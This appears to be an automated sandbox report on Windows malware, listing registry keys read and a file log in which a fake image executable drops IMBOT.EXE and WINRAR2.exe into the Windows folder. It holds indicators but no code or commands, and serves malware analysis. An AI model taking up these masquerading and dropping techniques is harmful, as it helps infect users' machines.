HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
File Changes by all processes
New Files
c:\images000123jpg.exe
C:\WINDOWS\CIMBOT.EXE
C:\WINDOWS\IMBOT.EXE
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
C:\WINDOWS\WINRAR2.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
\Device\RasAcd
Opened Files
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\de-DE\wshom.ocx.mui
C:\WINDOWS\system32\wshom.ocx
C:\WINDOWS\system32\stdole2.tlb
C:\WINDOWS\CIMBOT.EXE
\\.\PIPE\wkssvc
\\.\PIPE\lsarpc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\IMBOT.EXE.config
C:\WINDOWS\IMBOT.EXE
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\WINRAR2.exe.config
C:\WINDOWS\WINRAR2.exe
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\WINRAR2.exe
Deleted Files
C:\WINDOWS\CIMBOT.EXE
Chronological Order
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\de-DE\wshom.ocx.mui (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wshom.ocx (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\stdole2.tlb (OPEN_EXISTING)
Create/Open File: c:\images000123jpg.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\CIMBOT.EXE
Open File: C:\WINDOWS\CIMBOT.EXE (OPEN_EXISTING)
Create File: C:\WINDOWS\IMBOT.EXE
Delete File: C:\WINDOWS\CIMBOT.EXE
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\IMBOT.EXE Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\IMBOT.EXE:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\IMBOT.EXE
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\IMBOT.EXE.config (OPEN_EXISTING)
Open File: C:\WINDOWS\IMBOT.EXE (OPEN_EXISTING)
